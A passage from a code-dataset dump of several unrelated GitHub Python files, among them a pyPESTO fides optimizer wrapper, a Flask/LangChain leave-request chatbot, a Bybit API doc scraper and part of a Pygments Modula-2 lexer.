hybrid approximation\n that switches from the problem.objective provided Hessian (\n approximation) to a BFGS approximation will be used.\n \"\"\"\n super().__init__()\n\n try:\n import fides\n except ImportError:\n raise OptimizerImportError(\"fides\")\n\n if (\n (hessian_update is not None)\n and (hessian_update != 'default')\n and not isinstance(\n hessian_update,\n fides.hessian_approximation.HessianApproximation,\n )\n ):\n raise ValueError(\n 'Incompatible type for hessian update. '\n 'Must be a HessianApproximation, '\n f'was {type(hessian_update)}.'\n )\n\n if options is None:\n options = {}\n\n self.verbose = verbose\n self.options = options\n self.hessian_update = hessian_update\n\n def __repr__(self) -> str:\n rep = f\"<{self.__class__.__name__} \"\n # print everything that is customized\n if self.hessian_update is not None:\n if self.hessian_update == 'default':\n rep += f\" hessian_update={self.hessian_update}\"\n else:\n rep += (\n f\" hessian_update=\"\n f\"{self.hessian_update.__class__.__name__}\"\n )\n if self.verbose is not None:\n rep += f\" verbose={self.verbose}\"\n if self.options is not None:\n rep += f\" options={self.options}\"\n return rep + \">\"\n\n @fix_decorator\n @time_decorator\n @history_decorator\n def minimize(\n self,\n problem: Problem,\n x0: np.ndarray,\n id: str,\n history_options: HistoryOptions = None,\n optimize_options: OptimizeOptions = None,\n ) -> OptimizerResult:\n \"\"\"Perform optimization. Parameters: see `Optimizer` documentation.\"\"\"\n import fides\n\n if self.hessian_update == 'default':\n if not problem.objective.has_hess:\n warnings.warn(\n 'Fides is using BFGS as hessian approximation, '\n 'as the problem does not provide a Hessian. '\n 'Specify a Hessian to use a more efficient '\n 'hybrid approximation scheme.'\n )\n _hessian_update = fides.BFGS()\n else:\n _hessian_update = fides.HybridFixed()\n else:\n _hessian_update = self.hessian_update\n\n resfun = (\n _hessian_update.requires_resfun\n if _hessian_update is not None\n else False\n )\n\n args = {'mode': MODE_RES if resfun else MODE_FUN}\n\n if not problem.objective.has_grad:\n raise ValueError(\n 'Fides cannot be applied to problems '\n 'with objectives that do not support '\n 'gradient evaluation.'\n )\n\n if _hessian_update is None or (\n _hessian_update.requires_hess and not resfun\n ):\n if not problem.objective.has_hess:\n raise ValueError(\n 'Specified hessian update scheme cannot be '\n 'used with objectives that do not support '\n 'Hessian computation.'\n )\n args['sensi_orders'] = (0, 1, 2)\n else:\n args['sensi_orders'] = (0, 1)\n\n opt = fides.Optimizer(\n fun=problem.objective,\n funargs=args,\n ub=problem.ub,\n lb=problem.lb,\n verbose=self.verbose,\n hessian_update=_hessian_update,\n options=self.options,\n resfun=resfun,\n )\n\n try:\n opt.minimize(x0)\n msg = self._convert_exitflag_to_message(opt)\n except RuntimeError as err:\n msg = str(err)\n\n optimizer_result = OptimizerResult(\n x=opt.x_min,\n fval=opt.fval_min if not resfun else None,\n grad=opt.grad_min,\n hess=opt.hess,\n message=msg,\n exitflag=opt.exitflag,\n )\n\n return optimizer_result\n\n def is_least_squares(self):\n \"\"\"Check whether optimizer is a least squares optimizer.\"\"\"\n return False\n\n def _convert_exitflag_to_message(self, opt: fides.Optimizer):\n \"\"\"\n Convert the exitflag of a run to an informative message.\n\n Parameters\n ----------\n opt:\n The fides.Optimizer that has finished minimizing storing the\n exitflag.\n\n Returns\n -------\n An informative message on the cause of termination. Based on\n fides documentation.\n \"\"\"\n import fides\n\n messages = {\n fides.ExitFlag.DID_NOT_RUN: \"Optimizer did not run\",\n fides.ExitFlag.MAXITER: \"Reached maximum number of allowed iterations\",\n fides.ExitFlag.MAXTIME: \"Expected to reach maximum allowed time in next iteration\",\n fides.ExitFlag.NOT_FINITE: \"Encountered non-finite fval/grad/hess\",\n fides.ExitFlag.EXCEEDED_BOUNDARY: \"Exceeded specified boundaries\",\n fides.ExitFlag.DELTA_TOO_SMALL: \"Trust Region Radius too small to proceed\",\n fides.ExitFlag.FTOL: \"Converged according to fval difference\",\n fides.ExitFlag.XTOL: \"Converged according to x difference\",\n fides.ExitFlag.GTOL: \"Converged according to gradient norm\",\n }\n return messages.get(\n opt.exitflag, f\"exitflag={opt.exitflag} is not defined in fides.\"\n )\n","repo_name":"ICB-DCM/pyPESTO","sub_path":"pypesto/optimize/optimizer.py","file_name":"optimizer.py","file_ext":"py","file_size_in_byte":41918,"program_lang":"python","lang":"en","doc_type":"code","stars":175,"dataset":"github-code","pt":"37"} +{"seq_id":"10503654739","text":"from __future__ import division\n\nclass ExactDivision(float):\n def __new__(cls, value=0, denominator = None):\n if denominator:\n self = float.__new__(cls, float.__truediv__(float(value), float(denominator)))\n else:\n self = float.__new__(cls, value)\n self.numerator = value\n self.denominator = denominator\n return self\n \n def __truediv__(self, other):\n return ExactDivision(self, other)\n \n def __repr__(self):\n if self.denominator is None:\n return str(self.numerator)\n t = lambda x: isinstance(x, ExactDivision) and x.denominator is not None\n \n numerator = \"({})\".format(self.numerator) if t(self.numerator) else self.numerator\n denominator = \"({})\".format(self.denominator) if t(self.denominator) else self.denominator\n \n return \"{}/{}\".format(numerator, denominator)\n \n __str__ = __repr__\n\n\nED = ExactDivision\n\n__doc__ = \"\"\"\n>>> a = ED(8)\n>>> a\n8\n>>> a/3\n8/3\n>>> a/3/5\n(8/3)/5\n>>> round(a / 3, 3)\n2.667\n\"\"\"","repo_name":"jsbueno/intelligent_objects","sub_path":"exactdivision.py","file_name":"exactdivision.py","file_ext":"py","file_size_in_byte":1050,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"37"} +{"seq_id":"13175193109","text":"import glob\nimport serial\nimport time\n\ndef getPort():\n ports = glob.glob(\"/dev/tty.usbmodem*\")\n if len(ports)>0:\n return ports[0]\n return \"None\"\n\n\n\ndef getPositionString(position):\n x = (position[0]+40.0)*255.0/80.0\n y = position[1] * 255.0 / 40.0\n z = (position[2] + 35.0) * 255.0 / 80.0\n x = int(max(min(255.0, x),0.0))\n y = int(max(min(255.0, y), 0.0))\n z = int(max(min(255.0, z), 0.0))\n return \"x\"+chr(x)+\"y\"+chr(y)+\"z\"+chr(z)\n\ndef getSerialConnect():\n ser = serial.Serial(getPort(), 57600)\n print(\"connecting\")\n ready=str(ser.read(5))\n print(ready)\n return ser\n\n","repo_name":"cgarib/uArm_GUI","sub_path":"Arduino.py","file_name":"Arduino.py","file_ext":"py","file_size_in_byte":609,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71414449386","text":"# recreate question 1 using python\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\ndf = pd.read_csv(\"drinking.csv\", index_col=0)\nalcohol = df['Alcohol']\n\nalcohol.describe()\n\nplt.hist(alcohol)\nplt.show()\n","repo_name":"kayomotunde/probability-and-statistics","sub_path":"01-Lab Exercise - Drinking Habits and Integrity of College Students/01_question_1.py","file_name":"01_question_1.py","file_ext":"py","file_size_in_byte":208,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"32030737410","text":"from flask import Flask, request, jsonify\nfrom langchain.vectorstores import FAISS\nfrom langchain.chat_models import ChatOpenAI\nfrom langchain.embeddings.openai import OpenAIEmbeddings\nfrom langchain.chains import ConversationalRetrievalChain, ConversationChain\nfrom langchain.prompts import PromptTemplate\nfrom langchain.document_loaders import TextLoader\nfrom langchain.text_splitter import CharacterTextSplitter\nfrom langchain.chains import ChatVectorDBChain\nfrom langchain.chat_models import AzureChatOpenAI\nfrom langchain.memory import ConversationBufferMemory\nimport json\nimport os\n\nos.environ[\"OPENAI_API_TYPE\"] = \"azure\"\nos.environ[\"OPENAI_API_VERSION\"] = \"\"\nos.environ[\"OPENAI_API_BASE\"] = \"\"\nos.environ[\"OPENAI_API_KEY\"] = \"\"\n\napp = Flask(__name__)\n\n'''\n{\n \"userMessage\": {\n \"user_id\": \"A15\",\n \"question\": \"I will be taking leave from Oct 18 to 25\"\n }\n}\n'''\n\n# Human: I need to apply for my annual leave. How can I do that?\n# Bot: When will you be going on leave?\n# Human: I will be taking leave from Oct 18 to 25\n# Bot: Which country will you be going to?\n# Human: I will be going to Indonesia\n# Bot: Do you need a visa letter for your travel?\n# Human: Yes I need that\n# Bot: Do you need help to setup an out of office message for your leave period?\n# Human: No I dont need that\n# Bot: Do you need to delegate your approvals to someone else during your leave period?\n# Human: Yes please delegate\n\n# I will be going on leave from Sept 2 to 3, I am going to Indonesia and I dont need a visa letter. I need help to setup an out of office message and delegate approval to Superman\n'''\n{\n \"answer\": \"Understood, you would like to delegate your approvals during your leave period. Thank you for providing all the necessary information. I will proceed with the next steps.\",\n \"country_ID\": \"ID\",\n \"delegate\": \"y\",\n \"follow_a\": \"N/A\",\n \"fromDate\": \"18/10/2022\",\n \"intent\": \"leave\",\n \"setup_office\": \"n\",\n \"toDate\": \"25/10/2022\",\n \"visa_letter\": \"y\"\n}\n'''\n\nclass Session:\n def __init__(self):\n self.embedding_model = OpenAIEmbeddings(chunk_size=10)\n self.recipe_1 = TextLoader('FD.txt').load()\n self.text_splitter_1 = CharacterTextSplitter(chunk_overlap=100)\n self.recipe_1_content = self.text_splitter_1.split_documents(self.recipe_1)\n\n self.faiss_db = FAISS.from_documents(self.recipe_1_content, self.embedding_model) \n\n self.retriever = self.faiss_db.as_retriever(search_type=\"similarity\", search_kwargs={\"k\": 4})\n\n self.llm = AzureChatOpenAI(\n temperature=0,\n deployment_name=\"gpt-4\",\n )\n\n self.memory = ConversationBufferMemory(memory_key=\"chat_history\", input_key=\"question\", return_messages=True, output_key=\"answer\")\n\n self.prompt_template = \"\"\"\n You are a helpful support chatbot having a conversation with a human.\n Follow exactly these steps:\n 1. Read and examine the context below CAREFULLY.\n 2. Answer the question using only the context information\n\n User Question: \n {question}\n\n Context: \n {context}\n\n Chat History: \n {chat_history}\n\n\n Please note the following carefully:\n - You need to get the country name, if user didn't specify, please ask.\n - You NEED TO GET ALL follow up actions (follow_a) mentioned in the context answered by user. If not, KEEP asking user. DO NOT ask other questions. \n - Get the user leave dates and capture it in the fromDate and toDate. You need to get from and to date when the user will be leave, if you don't have this info, clarify with user.\n - if user needs a visa letter, capture that information in the visa_letter.\n - if user needs help to setup an out of office message, capture that information in the setup_office.\n - if user needs help to delegate their approval to Superman, capture that information in the delegate.\n - If you got all information you need, reply user with thanks I got all information I need and will proceed with next steps. Proceed to clear the chat_history\n - If you don't know the answer, just say you don't know. Do NOT try to make up an answer. If the question is not related to the context, politely respond that you are tuned to only answer questions that are related to the context. Use as much detail as possible when responding.\n - DO NOT reply with this: I'm sorry, but as a chatbot, I don't have personal plans or intentions.\n\n Reply in JSON format with the following information:\n answer, your answer should also mention the follow up action if any (ask one at a time) (i.e. answer)\n country ID (i.e. country_ID: ID for Indonesia, JP for Japan) \n intent (i.e. intent: leave)\n follow up action from the chatbot to human if any, reply one at a time, if not just reply with N/A (ie. follow_a)\n user leaves date from and to: (ie. fromDate, toDate) in this format DD/MM/YYYY. Both date from and to should be populated, if not ask user. if to date is lesser than from date, clarify with user.\n visa letter (ie. visa_letter: y or n)\n need to setup office (ie. setup_office: y or n)\n delegate their approval to Superman (ie. delegate: y or n)\n \"\"\"\n\n self.QA_PROMPT = PromptTemplate(\n template=self.prompt_template, input_variables=['context', 'question', 'chat_history']\n )\n\n self.qa = ConversationalRetrievalChain.from_llm(llm=self.llm, \n chain_type=\"stuff\",\n retriever=self.retriever, \n memory=self.memory, \n combine_docs_chain_kwargs={\"prompt\": self.QA_PROMPT},\n verbose=False)\n\n self.chat_history = []\n self.first_iteration = True\n\nsessions = {}\n\n@app.route('/greet', methods=['GET'])\ndef greet():\n return jsonify({'message': 'Hi, I am the Tango Bot!'})\n\n@app.route('/ask', methods=['POST'])\ndef ask_question():\n data = request.get_json()\n print(data)\n\n #remove this\n data = data[\"userMessage\"]\n #print(data)\n\n user_id = data.get('user_id', None)\n if user_id is None:\n return jsonify({'error': 'user_id is required'}), 400\n \n if user_id not in sessions:\n sessions[user_id] = Session()\n\n session = sessions[user_id]\n\n question = data.get('question', None)\n if question is None:\n return jsonify({'error': 'question is required'}), 400\n\n chat_history = session.chat_history\n result = session.qa({\"question\": question, \"chat_history\": chat_history})\n if not session.first_iteration:\n result = session.qa({\"question\": question, \"chat_history\": chat_history})\n\n chat_history.append((question, result[\"answer\"]))\n session.chat_history = chat_history\n\n session.first_iteration = False\n\n parsed_data = json.loads(result[\"answer\"])\n \n\n response_data = {\n \"answer\": parsed_data[\"answer\"],\n \"country_ID\": parsed_data[\"country_ID\"],\n \"intent\": parsed_data[\"intent\"],\n \"follow_a\": parsed_data[\"follow_a\"],\n \"fromDate\": parsed_data[\"fromDate\"],\n \"toDate\": parsed_data[\"toDate\"],\n \"visa_letter\": parsed_data[\"visa_letter\"],\n \"setup_office\": parsed_data[\"setup_office\"],\n \"delegate\": parsed_data[\"delegate\"]\n }\n\n return jsonify(response_data)\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port=8000)\n","repo_name":"ferrygun/MyChatBot","sub_path":"chatbot_app.py","file_name":"chatbot_app.py","file_ext":"py","file_size_in_byte":7615,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"4740598581","text":"import keyword\n\nimport bs4\nimport requests\n\n# pip isntall requests bs4\n\n# Running the script will create a bybit_doc_scraping.txt and md file in the current directory.\n\nurls = {\n 'Inverse': 'https://bybit-exchange.github.io/docs/inverse',\n 'Linear': 'https://bybit-exchange.github.io/docs/linear',\n 'Futures': 'https://bybit-exchange.github.io/docs/inverse_futures',\n # 'Spot': 'https://bybit-exchange.github.io/docs/spot',\n}\n\nrm_pathname = ['v2', 'linear', 'futures']\nrepl_pathname = {'open-api': 'private'}\n\ntype_mapping = {\n 'string': str,\n 'integer': int,\n 'int': int,\n 'number': float,\n 'bool': bool,\n}\n\ntable = {}\nwith open('bybit_doc_scraping.txt', 'w') as f:\n for cont, url in urls.items():\n r = requests.get(url)\n soup = bs4.BeautifulSoup(r.text, 'lxml')\n text = ''\n text += f'class {cont}:\\n'\n text += f' def __init__(self, request: RESTAPI._request):\\n'\n text += f' self._request = request\\n'\n text += f'\\n'\n print(text)\n f.write(text)\n\n http_request = False\n request_parameters = False\n # response_parameters = False\n desc = None\n method = None\n path = None\n params = []\n table[cont] = []\n for element in soup.select_one('body > div.page-wrapper > div.content'):\n if isinstance(element, bs4.element.Tag):\n if element.name in {'h1', 'h2', 'h3', }:\n # changed section\n if method and path:\n if path[0] != '/':\n path = '/' + path\n p_list = path[1:].split('/')\n for rm in rm_pathname:\n if rm in p_list:\n p_list.remove(rm)\n for k, v in repl_pathname.items():\n if k in p_list:\n idx = p_list.index(k)\n p_list[idx] = p_list[idx].replace(k, v)\n funcname = '_'.join(p_list).replace('-', '').lower()\n private = 'True' if 'private' in funcname else 'False'\n\n text = ''\n text += f' def {funcname}(\\n'\n text += f' self,\\n'\n for p, t in params:\n p = p if not keyword.iskeyword(p) else f'{p}_'\n text += f' {p}: {t.__name__}=None,\\n'\n text += f' ) -> requests.Response:\\n'\n text += f' \"\"\"\\n'\n text += f' {desc}\\n'\n text += f' \"\"\"\\n'\n text += f\" method = '{method}'\\n\"\n text += f\" path = '{path}'\\n\"\n text += f\" query = {{\\n\"\n for p, t in params:\n _p = p if not keyword.iskeyword(p) else f'{p}_'\n text += f\" '{p}': {_p},\\n\"\n text += f\" }}\\n\"\n text += f' return self._request(method, path, query, private={private})\\n'\n text += '\\n'\n print(text)\n f.write(text)\n\n table[cont] += [(funcname, method, path, desc, )]\n\n method = None\n path = None\n params.clear()\n desc = element.text\n if desc == 'Abandoned Endpoints':\n break\n elif element.name == 'p':\n if element.text == 'HTTP Request':\n http_request = True\n elif element.text == 'Request Parameters':\n request_parameters = True\n # elif element.text == 'Response Parameters':\n # response_parameters = True\n if http_request:\n if element.name == 'p':\n if element.select_one('code > span'):\n http_request = False\n strings = element.strings\n method: str = next(strings)[:-1]\n path: str = next(strings)\n if request_parameters:\n if element.name == 'table':\n request_parameters = False\n for tr in element.select('tbody > tr'):\n tr: bs4.element.Tag\n tds: list[bs4.Tag] = list(tr.select('td'))\n params.append((tds[0].text, type_mapping[tds[2].text], ))\n # if response_parameters:\n # pass\n\ntext = ''\ntext += '## メソッド名⇔エンドポイント名 対応表\\n'\nfor cont in table:\n text += f'### {cont}\\n'\n header = ['Method Name', 'Http Method', 'Endpoint URL', 'Description', ]\n text += f\"| {' | '.join(header)} |\\n\"\n text += f\"| {' | '.join(['---'] * len(header))} |\\n\"\n for row in table[cont]:\n text += f\"| {' | '.join(row)} |\\n\"\nprint(text)\nwith open('bybit_doc_scraping.md', 'w') as f:\n f.write(text)","repo_name":"MtkN1/pybybit","sub_path":"pybybit/util/bybit_doc_scraping.py","file_name":"bybit_doc_scraping.py","file_ext":"py","file_size_in_byte":5348,"program_lang":"python","lang":"en","doc_type":"code","stars":51,"dataset":"github-code","pt":"37"} +{"seq_id":"8397769411","text":"import re\n\nfrom pygments.lexer import RegexLexer, include\nfrom pygments.util import get_bool_opt, get_list_opt\nfrom pygments.token import Text, Comment, Operator, Keyword, Name, \\\n String, Number, Punctuation, Error\n\n__all__ = ['Modula2Lexer']\n\n\n# Multi-Dialect Modula-2 Lexer\nclass Modula2Lexer(RegexLexer):\n \"\"\"\n For `Modula-2 `_ source code.\n\n The Modula-2 lexer supports several dialects. By default, it operates in\n fallback mode, recognising the *combined* literals, punctuation symbols\n and operators of all supported dialects, and the *combined* reserved words\n and builtins of PIM Modula-2, ISO Modula-2 and Modula-2 R10, while not\n differentiating between library defined identifiers.\n\n To select a specific dialect, a dialect option may be passed\n or a dialect tag may be embedded into a source file.\n\n Dialect Options:\n\n `m2pim`\n Select PIM Modula-2 dialect.\n `m2iso`\n Select ISO Modula-2 dialect.\n `m2r10`\n Select Modula-2 R10 dialect.\n `objm2`\n Select Objective Modula-2 dialect.\n\n The PIM and ISO dialect options may be qualified with a language extension.\n\n Language Extensions:\n\n `+aglet`\n Select Aglet Modula-2 extensions, available with m2iso.\n `+gm2`\n Select GNU Modula-2 extensions, available with m2pim.\n `+p1`\n Select p1 Modula-2 extensions, available with m2iso.\n `+xds`\n Select XDS Modula-2 extensions, available with m2iso.\n\n\n Passing a Dialect Option via Unix Commandline Interface\n\n Dialect options may be passed to the lexer using the `dialect` key.\n Only one such option should be passed. If multiple dialect options are\n passed, the first valid option is used, any subsequent options are ignored.\n\n Examples:\n\n `$ pygmentize -O full,dialect=m2iso -f html -o /path/to/output /path/to/input`\n Use ISO dialect to render input to HTML output\n `$ pygmentize -O full,dialect=m2iso+p1 -f rtf -o /path/to/output /path/to/input`\n Use ISO dialect with p1 extensions to render input to RTF output\n\n\n Embedding a Dialect Option within a source file\n\n A dialect option may be embedded in a source file in form of a dialect\n tag, a specially formatted comment that specifies a dialect option.\n\n Dialect Tag EBNF::\n\n dialectTag :\n OpeningCommentDelim Prefix dialectOption ClosingCommentDelim ;\n\n dialectOption :\n 'm2pim' | 'm2iso' | 'm2r10' | 'objm2' |\n 'm2iso+aglet' | 'm2pim+gm2' | 'm2iso+p1' | 'm2iso+xds' ;\n\n Prefix : '!' ;\n\n OpeningCommentDelim : '(*' ;\n\n ClosingCommentDelim : '*)' ;\n\n No whitespace is permitted between the tokens of a dialect tag.\n\n In the event that a source file contains multiple dialect tags, the first\n tag that contains a valid dialect option will be used and any subsequent\n dialect tags will be ignored. Ideally, a dialect tag should be placed\n at the beginning of a source file.\n\n An embedded dialect tag overrides a dialect option set via command line.\n\n Examples:\n\n ``(*!m2r10*) DEFINITION MODULE Foobar; ...``\n Use Modula2 R10 dialect to render this source file.\n ``(*!m2pim+gm2*) DEFINITION MODULE Bazbam; ...``\n Use PIM dialect with GNU extensions to render this source file.\n\n\n Algol Publication Mode:\n\n In Algol publication mode, source text is rendered for publication of\n algorithms in scientific papers and academic texts, following the format\n of the Revised Algol-60 Language Report. It is activated by passing\n one of two corresponding styles as an option:\n\n `algol`\n render reserved words lowercase underline boldface\n and builtins lowercase boldface italic\n `algol_nu`\n render reserved words lowercase boldface (no underlining)\n and builtins lowercase boldface italic\n\n The lexer automatically performs the required lowercase conversion when\n this mode is activated.\n\n Example:\n\n ``$ pygmentize -O full,style=algol -f latex -o /path/to/output /path/to/input``\n Render input file in Algol publication mode to LaTeX output.\n\n\n Rendering Mode of First Class ADT Identifiers:\n\n The rendering of standard library first class ADT identifiers is controlled\n by option flag \"treat_stdlib_adts_as_builtins\".\n\n When this option is turned on, standard library ADT identifiers are rendered\n as builtins. When it is turned off, they are rendered as ordinary library\n identifiers.\n\n `treat_stdlib_adts_as_builtins` (default: On)\n\n The option is useful for dialects that support ADTs as first class objects\n and provide ADTs in the standard library that would otherwise be built-in.\n\n At present, only Modula-2 R10 supports library ADTs as first class objects\n and therefore, no ADT identifiers are defined for any other dialects.\n\n Example:\n\n ``$ pygmentize -O full,dialect=m2r10,treat_stdlib_adts_as_builtins=Off ...``\n Render standard library ADTs as ordinary library types.\n\n .. versionadded:: 1.3\n\n .. versionchanged:: 2.1\n Added multi-dialect support.\n \"\"\"\n name = 'Modula-2'\n aliases = ['modula2', 'm2']\n filenames = ['*.def', '*.mod']\n mimetypes = ['text/x-modula2']\n\n flags = re.MULTILINE | re.DOTALL\n\n tokens = {\n 'whitespace': [\n (r'\\n+', Text), # blank lines\n (r'\\s+', Text), # whitespace\n ],\n 'dialecttags': [\n # PIM Dialect Tag\n (r'\\(\\*!m2pim\\*\\)', Comment.Special),\n # ISO Dialect Tag\n (r'\\(\\*!m2iso\\*\\)', Comment.Special),\n # M2R10 Dialect Tag\n (r'\\(\\*!m2r10\\*\\)', Comment.Special),\n # ObjM2 Dialect Tag\n (r'\\(\\*!objm2\\*\\)', Comment.Special),\n # Aglet Extensions Dialect Tag\n (r'\\(\\*!m2iso\\+aglet\\*\\)', Comment.Special),\n # GNU Extensions Dialect Tag\n (r'\\(\\*!m2pim\\+gm2\\*\\)', Comment.Special),\n # p1 Extensions Dialect Tag\n (r'\\(\\*!m2iso\\+p1\\*\\)', Comment.Special),\n # XDS Extensions Dialect Tag\n (r'\\(\\*!m2iso\\+xds\\*\\)', Comment.Special),\n ],\n 'identifiers': [\n (r'([a-zA-Z_$][\\w$]*)', Name),\n ],\n 'prefixed_number_literals': [\n #\n # Base-2, whole number\n (r'0b[01]+(\\'[01]+)*', Number.Bin),\n #\n # Base-16, whole number\n (r'0[ux][0-9A-F]+(\\'[0-9A-F]+)*', Number.Hex),\n ],\n 'plain_number_literals': [\n #\n # Base-10, real number with exponent\n (r'[0-9]+(\\'[0-9]+)*' # integral part\n r'\\.[0-9]+(\\'[0-9]+)*' # fractional part\n r'[eE][+-]?[0-9]+(\\'[0-9]+)*', # exponent\n Number.Float),\n #\n # Base-10, real number without exponent\n (r'[0-9]+(\\'[0-9]+)*' # integral part\n r'\\.[0-9]+(\\'[0-9]+)*', # fractional part\n Number.Float),\n #\n # Base-10, whole number\n (r'[0-9]+(\\'[0-9]+)*', Number.Integer),\n ],\n 'suffixed_number_literals': [\n #\n # Base-8, whole number\n (r'[0-7]+B', Number.Oct),\n #\n # Base-8, character code\n (r'[0-7]+C', Number.Oct),\n #\n # Base-16, number\n (r'[0-9A-F]+H', Number.Hex),\n ],\n 'string_literals': [\n (r\"'(\\\\\\\\|\\\\'|[^'])*'\", String), # single quoted string\n (r'\"(\\\\\\\\|\\\\\"|[^\"])*\"', String), # double quoted string\n ],\n 'digraph_operators': [\n # Dot Product Operator\n (r'\\*\\.', Operator),\n # Array Concatenation Operator\n (r'\\+>', Operator), # M2R10 + ObjM2\n # Inequality Operator\n (r'<>', Operator), # ISO + PIM\n # Less-Or-Equal, Subset\n (r'<=', Operator),\n # Greater-Or-Equal, Superset\n (r'>=', Operator),\n # Identity Operator\n (r'==', Operator), # M2R10 + ObjM2\n # Type Conversion Operator\n (r'::', Operator), # M2R10 + ObjM2\n # Assignment Symbol\n (r':=', Operator),\n # Postfix Increment Mutator\n (r'\\+\\+', Operator), # M2R10 + ObjM2\n # Postfix Decrement Mutator\n (r'--', Operator), # M2R10 + ObjM2\n ],\n 'unigraph_operators': [\n # Arithmetic Operators\n (r'[+-]', Operator),\n (r'[*/]', Operator),\n # ISO 80000-2 compliant Set Difference Operator\n (r'\\\\', Operator), # M2R10 + ObjM2\n # Relational Operators\n (r'[=#<>]', Operator),\n # Dereferencing Operator\n (r'\\^', Operator),\n # Dereferencing Operator Synonym\n (r'@', Operator), # ISO\n # Logical AND Operator Synonym\n (r'&', Operator), # PIM + ISO\n # Logical NOT Operator Synonym\n (r'~', Operator), # PIM + ISO\n # Smalltalk Message Prefix\n (r'`', Operator), # ObjM2\n ],\n 'digraph_punctuation': [\n # Range Constructor\n (r'\\.\\.', Punctuation),\n # Opening Chevron Bracket\n (r'<<', Punctuation), # M2R10 + ISO\n # Closing Chevron Bracket\n (r'>>', Punctuation), # M2R10 + ISO\n # Blueprint Punctuation\n (r'->', Punctuation), # M2R10 + ISO\n # Distinguish |# and # in M2 R10\n (r'\\|#', Punctuation),\n # Distinguish ## and # in M2 R10\n (r'##', Punctuation),\n # Distinguish |* and * in M2 R10\n (r'\\|\\*', Punctuation),\n ],\n 'unigraph_punctuation': [\n # Common Punctuation\n (r'[()\\[\\]{},.:;|]', Punctuation),\n # Case Label Separator Synonym\n (r'!', Punctuation), # ISO\n # Blueprint Punctuation\n (r'\\?', Punctuation), # M2R10 + ObjM2\n ],\n 'comments': [\n # Single Line Comment\n (r'^//.*?\\n', Comment.Single), # M2R10 + ObjM2\n # Block Comment\n (r'\\(\\*([^$].*?)\\*\\)', Comment.Multiline),\n # Template Block Comment\n (r'/\\*(.*?)\\*/', Comment.Multiline), # M2R10 + ObjM2\n ],\n 'pragmas': [\n # ISO Style Pragmas\n (r'<\\*.*?\\*>', Comment.Preproc), # ISO, M2R10 + ObjM2\n # Pascal Style Pragmas\n (r'\\(\\*\\$.*?\\*\\)', Comment.Preproc), # PIM\n ],\n 'root': [\n include('whitespace'),\n include('dialecttags'),\n include('pragmas'),\n include('comments'),\n include('identifiers'),\n include('suffixed_number_literals'), # PIM + ISO\n include('prefixed_number_literals'), # M2R10 + ObjM2\n include('plain_number_literals'),\n include('string_literals'),\n include('digraph_punctuation'),\n include('digraph_operators'),\n include('unigraph_punctuation'),\n include('unigraph_operators'),\n ]\n }\n\n# C o m m o n D a t a s e t s\n\n # Common Reserved Words Dataset\n common_reserved_words = (\n # 37 common reserved words\n 'AND', 'ARRAY', 'BEGIN', 'BY', 'CASE', 'CONST', 'DEFINITION', 'DIV',\n 'DO', 'ELSE', 'ELSIF', 'END', 'EXIT', 'FOR', 'FROM', 'IF',\n 'IMPLEMENTATION', 'IMPORT', 'IN', 'LOOP', 'MOD', 'MODULE', 'NOT',\n 'OF', 'OR', 'POINTER', 'PROCEDURE', 'RECORD', 'REPEAT', 'RETURN',\n 'SET', 'THEN', 'TO', 'TYPE', 'UNTIL', 'VAR', 'WHILE',\n )\n\n # Common Builtins Dataset\n common_builtins = (\n # 16 common builtins\n 'ABS', 'BOOLEAN', 'CARDINAL', 'CHAR', 'CHR', 'FALSE', 'INTEGER',\n 'LONGINT', 'LONGREAL', 'MAX', 'MIN', 'NIL', 'ODD', 'ORD', 'REAL',\n 'TRUE',\n )\n\n # Common Pseudo-Module Builtins Dataset\n common_pseudo_builtins = (\n # 4 common pseudo builtins\n 'ADDRESS', 'BYTE', 'WORD', 'ADR'\n )\n\n# P I M M o d u l a - 2 D a t a s e t s\n\n # Lexemes to Mark as Error Tokens for PIM Modula-2\n pim_lexemes_to_reject = (\n '!', '`', '@', '$', '%', '?', '\\\\', '==', '++', '--', '::', '*.',\n '+>', '->', '<<', '>>', '|#', '##',\n )\n\n # PIM Modula-2 Additional Reserved Words Dataset\n pim_additional_reserved_words = (\n # 3 additional reserved words\n 'EXPORT', 'QUALIFIED', 'WITH',\n )\n\n # PIM Modula-2 Additional Builtins Dataset\n pim_additional_builtins = (\n # 16 additional builtins\n 'BITSET', 'CAP', 'DEC', 'DISPOSE', 'EXCL', 'FLOAT', 'HALT', 'HIGH',\n 'INC', 'INCL', 'NEW', 'NIL', 'PROC', 'SIZE', 'TRUNC', 'VAL',\n )\n\n # PIM Modula-2 Additional Pseudo-Module Builtins Dataset\n pim_additional_pseudo_builtins = (\n # 5 additional pseudo builtins\n 'SYSTEM', 'PROCESS', 'TSIZE', 'NEWPROCESS', 'TRANSFER',\n )\n\n# I S O M o d u l a - 2 D a t a s e t s\n\n # Lexemes to Mark as Error Tokens for ISO Modula-2\n iso_lexemes_to_reject = (\n '`', '$', '%', '?', '\\\\', '==', '++', '--', '::', '*.', '+>', '->',\n '<<', '>>', '|#', '##',\n )\n\n # ISO Modula-2 Additional Reserved Words Dataset\n iso_additional_reserved_words = (\n # 9 additional reserved words (ISO 10514-1)\n 'EXCEPT', 'EXPORT', 'FINALLY', 'FORWARD', 'PACKEDSET', 'QUALIFIED',\n 'REM', 'RETRY', 'WITH',\n # 10 additional reserved words (ISO 10514-2 & ISO 10514-3)\n 'ABSTRACT', 'AS', 'CLASS', 'GUARD', 'INHERIT', 'OVERRIDE', 'READONLY',\n 'REVEAL', 'TRACED', 'UNSAFEGUARDED',\n )\n\n # ISO Modula-2 Additional Builtins Dataset\n iso_additional_builtins = (\n # 26 additional builtins (ISO 10514-1)\n 'BITSET', 'CAP', 'CMPLX', 'COMPLEX', 'DEC', 'DISPOSE', 'EXCL', 'FLOAT',\n 'HALT', 'HIGH', 'IM', 'INC', 'INCL', 'INT', 'INTERRUPTIBLE', 'LENGTH',\n 'LFLOAT', 'LONGCOMPLEX', 'NEW', 'PROC', 'PROTECTION', 'RE', 'SIZE',\n 'TRUNC', 'UNINTERRUBTIBLE', 'VAL',\n # 5 additional builtins (ISO 10514-2 & ISO 10514-3)\n 'CREATE', 